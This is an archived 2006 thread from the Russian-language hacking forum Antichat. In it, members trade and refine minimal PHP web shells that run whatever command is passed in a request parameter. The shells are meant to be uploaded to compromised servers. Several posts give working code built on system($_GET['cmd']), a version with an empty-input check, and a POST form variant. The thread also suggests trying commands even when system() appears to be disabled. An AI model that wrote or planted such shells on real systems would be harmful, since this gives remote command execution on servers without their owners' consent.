Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
10.06.2006, 18:07
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
ИНТЕРЕСНО...шелл на php
Модерам: Извините, если я запостил данную тему не в этом разделе..., просто не знаю к чему её отнести...если, что перенесите.
Вот выношу на обсуждение интересную весчъ...
Частенько заливая самописный шелл на типа вот этого:
<?php
echo "<pre>";
system($_GET['cmd']);
echo "</pre>"
?> и обращаясь к нему по типу вот этого: _http://someserver.com/shell.php я получал ошибку,что мол
Warning!!! ла-ла ... функция system запрещена...
Но всё равно обратившись по ссылке _http://someserver.com/shell.php?cmd=ls -la получил листинг данной директори... и это был не единственный случай!!!
Мораль сей басни: сперва попробуйте выполнить команду, чем сразу к другим действиям...
|
|
|
10.06.2006, 18:21
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217
Репутация:
685
|
|
думаю это не листинг, даже не includ,
А что же это, что за явление?))
Глупая тема, если хватило ума залить шелл, то тем более хватит проверить, что бы там не писалось.
Фтопку!
|
|
|
|
10.06.2006, 18:31
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
когда ты обращаешься по адрессу
http://someserver.com/shell.php
то ошибка происходит в строке
system($_GET['cmd']);
так как не определен параметр cmd
если ты будешь вызывать строку как
@system($_GET['cmd']);
то ошибки не будет. |
|
|
|
10.06.2006, 18:32
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Я конечно, не чего не хочу сказать, но сколько я видео не смотрел, когда заливают шелл, и вылетает такая муйня, то сразу переходят к другим методам...
|
|
|
|
10.06.2006, 18:50
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
переходят к другим методам, когда она действительна отключена.
а по твоему первому посту, этого не видно.
|
|
|
|
10.06.2006, 20:06
|
|
Новичок
Регистрация: 09.06.2006
Сообщений: 16
Провел на форуме:
27859
Репутация:
5
|
|
Сообщение от k1b0rg
если ты будешь вызывать строку как
@system($_GET['cmd']);
то ошибки не будет.
ошибка будет, просто об этом не будет сообщения..
хотя чего эт я придираюсь, суть то одна)
|
|
|
|
10.06.2006, 21:19
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903
Репутация:
345
|
|
юзаем
<?
if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}
?>
а лучше вообще пост, но это в идеале |
|
|
|
10.06.2006, 22:27
|
|
Новичок
Регистрация: 09.06.2006
Сообщений: 16
Провел на форуме:
27859
Репутация:
5
|
|
а ещё добавим прелести, что б потом люди не пужалися, что чёт не работает... если конешн не для себя пишем 
<?
if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}
else {
echo 'не введены данные запроса';
exit;
}
?> |
|
|
|
10.06.2006, 22:57
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
не спорю...
хотя на мой взгляд удобнее чем этот простого шелла нет...
<form method=post>
<input type=text name=cmd size=50>
<input type=submit value="Жми на пимпу">
</form>
<?php
echo "<pre>";
system(cmd);
echo "</pre>";
?> ....
Последний раз редактировалось Dr.Check; 10.06.2006 в 23:00..
|
|
|
|
10.06.2006, 23:00
|
|
Новичок
Регистрация: 09.06.2006
Сообщений: 16
Провел на форуме:
27859
Репутация:
5
|
|
так это через post
а я оставил вариант через get
)
эдак мы сейчас для удобства такого понапишем... ещё одинr57shell |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для NaX[no]rT](/avatars/avatar18908.gif){kind=avatar}
![Отправить сообщение для NaX[no]rT с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
